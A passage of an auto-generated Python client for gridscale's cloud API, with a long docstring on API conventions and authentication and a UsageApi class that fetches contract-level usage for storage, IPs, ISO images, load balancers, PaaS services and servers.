gridscale/gridscale_api_client_python
|
755b8e8a017784a4f5c6b3a577338ff988c41a9a
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
API Specification
# Introduction Welcome to gridscales API documentation. A REST API is a programming interface that allows you to access and send data directly to our systems using HTTPS requests, without the need to use a web GUI. All the functionality you are already familiar with in your control panel is accessible through the API, including expert methods that are only available through the API. Allowing you to script any actions you require, regardless of their complexity. First we will start with a general overview about how the API works, followed by an extensive list of each endpoint, describing them in great detail. ## Requests For security, gridscale requires all API requests are made through the HTTPS protocol so that traffic is encrypted. The following table displays the different type of requests that the interface responds to, depending on the action you require. | Method | Description | | --- | --- | | GET | A simple search of information. The response is a JSON object. Requests using GET are always read-only. | | POST | Adds new objects and object relations. The POST request must contain all the required parameters in the form of a JSON object. | | PATCH | Changes an object or an object relation. The parameters in PATCH requests are usually optional, so only the changed parameters must be specified in a JSON object. | | DELETE | Deletes an object or object relation. The object is deleted if it exists. | | OPTIONS | Get an extensive list of the servers support methods and characteristics. We will not give example OPTION requests on each endpoint, as they are extensive and self-descriptive. | <aside class=\"notice\"> The methods PATCH and DELETE are idempotent - that is, a request with identical parameters can be sent several times, and it doesn't change the result. </aside> ## Status Codes | HTTP Status | `Message` | Description | | --- | --- | --- | | 200 | `OK` | The request has been successfully processed and the result of the request is transmitted in the response. | | 202 | `Accepted` | The request has been accepted, but will run at a later date. Meaning we can not guarantee the success of the request. You should poll the request to be notified once the resource has been provisioned - see the requests endpoint on how to poll. | | 204 | `No Content` | The request was successful, but the answer deliberately contains no data. | | 400 | `Bad Request` | The request message was built incorrectly. | | 401 | `Unauthorised` | The request can not be performed without a valid authentication. X-Auth UserId or X-Auth token HTTP header is not set or the userID / token is invalid. | | 402 | `Payment Required` | Action can not be executed - not provided any or invalid payment methods. | | 403 | `Forbidden` | The request was not carried out due to lack of authorization of the user or because an impossible action was requested. | | 404 | `Not Found` | The requested resource was not found. Will also be used if you do a resource exists, but the user does not have permission for it. | | 405 | `Method Not Allowed` | The request may be made only with other HTTP methods (eg GET rather than POST). | | 409 | `Conflict` | The request was made under false assumptions. For example, a user can not be created twice with the same email. | | 415 | `Unsupported Media Type` | The contents of the request have been submitted with an invalid media type. All POST or PATCH requests must have \"Content-Type : application / json\" as a header, and send a JSON object as a payload. | | 416 | `Requested Range Not Satisfiable` | The request could not be fulfilled. It is possible that a resource limit was reached or an IPv4 address pool is exhausted. | | 424 | `Failed Dependency` | The request could not be performed because the object is in the wrong status. | | 429 | `Too Many Requests` | The request has been rejected because rate limits have been exceeded. | <aside class=\"success\"> Status 200-204 indicates that the request has been accepted and is processed. </aside> <aside class=\"notice\"> Status 400-429 indicates that there was a problem with the request that originated on the client. You will find more information about the problem in the body of 4xx response. </aside> <aside class=\"warning\"> A status 500 means that there was a server-side problem and your request can not be processed now. </aside> ## Request Headers | Header | Description | | --- | --- | | Content-Type | Always \"application/json\". | | X-Auth-userId | The user UUID. This can be found in the panel under \"API\" and will never change ( even after the change of user e-mail). | | X-Auth-Token | Is generated from the API hash and must be sent with all API requests. Both the token and its permissions can be configured in the panel.| ## Response Headers | Header | Description | | --- | --- | | Content-Type | Always \"application/json\". | | X-Time-Provisioning | The time taken to process the request (in ms). | | X-Api-Identity | The currently active Provisioning API version. Useful when reporting bugs to us. | | X-Request-Id | The unique identifier of the request, be sure to include it when referring to a request. | | RateLimit-Limit | The number of requests that can be made per minute. | | RateLimit-Remaining | The number of requests that still remain before you hit your request limit. | | RateLimit-Reset | A [Unix timestamp](https://en.wikipedia.org/wiki/Unix_time) in milliseconds of when the rate limit will reset, or the time at which a request no longer will return 429 - Too Many Requests. | ## Timestamp Format All timestamps follow <a href=\"https://de.wikipedia.org/wiki/ISO_8601\" target=\"_blank_\">ISO 8601</a> and issued in <a href=\"https://www.timeanddate.de/zeitzonen/utc-gmt\" target=\"_blank_\">UTC</a> ## CORS ### Cross Origin Resource Sharing To allow API access from other domains that supports the API CORS (Cross Origin Resource Sharing). See: enable-cors.org/ . This allows direct use the API in the browser running a JavaScript web control panel. All this is done in the background by the browser. The following HTTP headers are set by the API: Header | Parameter | Description --- | --- | --- Access-Control-Allow-Methods | GET, POST, PUT, PATCH, DELETE, OPTIONS | Contains all available methods that may be used for queries. Access-Control-Allow-Credentials | true | Is set to \"true\". Allows the browser to send the authentication data via X-Auth HTTP header. Access-Control-Allow-Headers | Origin, X-Requested-With, Content-Type, Accept, X-Auth-UserId, X-Auth-Token, X-Exec-Time, X-API-Version, X-Api-Client | The HTTP headers available for requests. Access-Control-Allow-Origin | * | The domain sent by the browser as a source of demand. Access-Control-Expose-Headers | X-Exec-Time, X-Api-Version | The HTTP headers that can be used by a browser application. ## Rate Limits The number of requests that can be made through our API is currently limited to 210 requests per 60 seconds. The current state of rate limiting is returned within the response headers of each request. The relevant response headers are - RateLimit-Limit - RateLimit-Remaining - RateLimit-Reset See the Response Headers section for details. As long as the `RateLimit-Remaining` count is above zero, you will be able to make further requests. As soon as the `RateLimit-Remaining` header value is zero, subsequent requests will return the 429 status code. This will stay until the timestamp given in `RateLimit-Reset` has been reached. ### Example rate limiting response ```shell HTTP/1.0 429 TOO MANY REQUESTS Content-Length: 66 Content-Type: application/json; charset=utf-8 Date: Mon, 11 Nov 2019 11:11:33 GMT RateLimit-Limit: 210 RateLimit-Remaining: 0 RateLimit-Reset: 1573468299256 { \"id\": \"too_many_requests\", \"message\": \"API Rate limit exceeded.\" } ``` It is important to understand how rate limits are reset in order to use the API efficiently. Rate limits are reset for all counted requests at once. This means that that once the timestamp `RateLimit-Remaining` has arrived all counted request are reset and you can again start sending requests to the API. This allows for short burst of traffic. The downside is once you have hit the request limit no more requests are allowed until the rate limit duration is reset. ## Object Relations Relationships describe resource objects (storages, networks, IPs, etc.) that are connected to a server. These relationships are treated like objects themselves and can have properties specific to this relation. One example would be, that the MAC address of a private network connected to a server (Server-to-Network relation) can be found as property of the relation itself - the relation is the _network interface_ in the server. Another example is storage, where the SCSI LUN is also part of the Server-to-Storage relation object. This information is especially interesting if some kind of network boot is used on the servers, where the properties of the server need to be known beforehand. ## Deleted Objects Objects that are deleted are no longer visible on their *regular* endpoints. For historical reasons these objects are still available read-only on a special endpoint named /deleted. If objects have been deleted but have not yet been billed in the current period, the yet-to-be-billed price is still shown. <!-- #strip_js --> ## Node.js / Javascript Library We have a JavaScript library for you to use our API with ease. <a href=\"https://badge.fury.io/js/%40gridscale%2Fgsclient-js\"><img src=\"https://badge.fury.io/js/%40gridscale%2Fgsclient-js.svg\" alt=\"npm version\" height=\"18\"></a> <aside class=\"success\"> We want to make it even easier for you to manage your Infrastructure via our API - so feel free to contact us with any ideas, or languages you would like to see included. </aside> Requests with our Node.js lib return a little differently. Everything is the same except it allows you to add URL parameters to customize your requests. To get started <a href=\"https://www.npmjs.com/package/@gridscale/gsclient-js\" target=\"_blank\">click here</a> . <!-- #strip_js_end --> <!-- #strip_go --> ## Golang Library We also have a Golang library for Gophers. Requests with our Golang lib return a little differently. Everything is the same except it allows you to add URL parameters to customize your requests. To get started <a href=\"https://github.com/gridscale/gsclient-go\" target=\"_blank\">click here</a> . <!-- #strip_go_end --> <!-- #strip_python --> ## Python Library We have a Python library, that optionally also simplifies handling of asynchronous requests by mimicking synchronous blocking behaviour. To get started <a href=\"https://pypi.org/project/gs-api-client/\" target=\"_blank\">click here</a> . <!-- #strip_python_end --> # Authentication In order to use the API, the User-UUID and an API_Token are required. Both are available via the web GUI which can be found here on <a href=\"https://my.gridscale.io/APIs/\" target=\"_blank\">Your Account</a> <aside class=\"success\"> If you are logged in, your UUID and Token will be pulled dynamically from your account, so you can copy request examples straight into your code. </aside> The User-UUID remains the same, even if the users email address is changed. The API_Token is a randomly generated hash that allows read/write access. ## API_Token <table class=\"security-details\"><tbody><tr><th> Security scheme type: </th><td> API Key </td></tr><tr><th> header parameter name:</th><td> X-Auth-Token </td></tr></tbody></table> ## User_UUID <table class=\"security-details\"><tbody><tr><th> Security scheme type: </th><td> API Key </td></tr><tr><th> header parameter name:</th><td> X-Auth-UserId </td></tr></tbody></table> ## Examples <!-- #strip_js --> > Node.js ``` // to get started // read the docs @ https://www.npmjs.com/package/@gs_js_auth/api var gs_js_auth = require('@gs_js_auth/api').gs_js_auth; var client = new gs_js_auth.Client(\"##API_TOKEN##\",\"##USER_UUID##\"); ``` <!-- #strip_js_end --> <!-- #strip_go --> > Golang ``` // to get started // read the docs @ https://github.com/gridscale/gsclient-go config := gsclient.NewConfiguration( \"https://api.gridscale.io\", \"##USER_UUID##\", \"##API_TOKEN##\", false, //set debug mode ) client := gsclient.NewClient(config) ``` <!-- #strip_go_end --> > Shell Authentication Headers ``` -H \"X-Auth-UserId: ##USER_UUID##\" \\ -H \"X-Auth-Token: ##API_TOKEN##\" \\ ``` > Setting Authentication in your Environment variables ``` export API_TOKEN=\"##API_TOKEN##\" USER_UUID=\"##USER_UUID##\" ``` <aside class=\"notice\"> You must replace <code>USER_UUID</code> and <code>API_Token</code> with your personal UUID and API key respectively. </aside> # noqa: E501
OpenAPI spec version: 1.0.50
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from gs_api_client.swagger.api_client import ApiClient
class UsageApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def contract_level_distributed_storage_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract level rocket storage usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_distributed_storage_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: DistributedStoragesUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.contract_level_distributed_storage_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.contract_level_distributed_storage_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def contract_level_distributed_storage_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract level rocket storage usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_distributed_storage_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: DistributedStoragesUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method contract_level_distributed_storage_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `contract_level_distributed_storage_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/contracts/usage/distributed_storages', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DistributedStoragesUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def contract_level_ip_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract level ip usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_ip_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: IpsUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.contract_level_ip_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.contract_level_ip_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def contract_level_ip_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract level ip usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_ip_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: IpsUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method contract_level_ip_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `contract_level_ip_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/contracts/usage/ip_addresses', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IpsUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def contract_level_isoimage_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract level iso images usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_isoimage_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: IsoimagesUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.contract_level_isoimage_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.contract_level_isoimage_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def contract_level_isoimage_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract level iso images usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_isoimage_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: IsoimagesUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method contract_level_isoimage_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `contract_level_isoimage_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/contracts/usage/iso_images', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IsoimagesUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def contract_level_loadbalancer_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract load balancers usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_loadbalancer_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: LoadbalancersUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.contract_level_loadbalancer_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.contract_level_loadbalancer_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def contract_level_loadbalancer_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract load balancers usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_loadbalancer_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: LoadbalancersUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method contract_level_loadbalancer_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `contract_level_loadbalancer_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/contracts/usage/load_balancers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LoadbalancersUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def contract_level_paas_service_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract paas services usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_paas_service_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: PaasServicesUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.contract_level_paas_service_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.contract_level_paas_service_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def contract_level_paas_service_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract paas services usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_paas_service_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: PaasServicesUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method contract_level_paas_service_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `contract_level_paas_service_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/contracts/usage/paas_services', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PaasServicesUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def contract_level_rocket_storage_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract level rocket storage usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_rocket_storage_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: RocketStoragesUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.contract_level_rocket_storage_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.contract_level_rocket_storage_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def contract_level_rocket_storage_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract level rocket storage usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_rocket_storage_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: RocketStoragesUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method contract_level_rocket_storage_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `contract_level_rocket_storage_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/contracts/usage/rocket_storages', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RocketStoragesUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def contract_level_server_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract level Server usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_server_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: ServersUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.contract_level_server_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.contract_level_server_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def contract_level_server_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract level Server usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_server_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: ServersUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method contract_level_server_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `contract_level_server_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
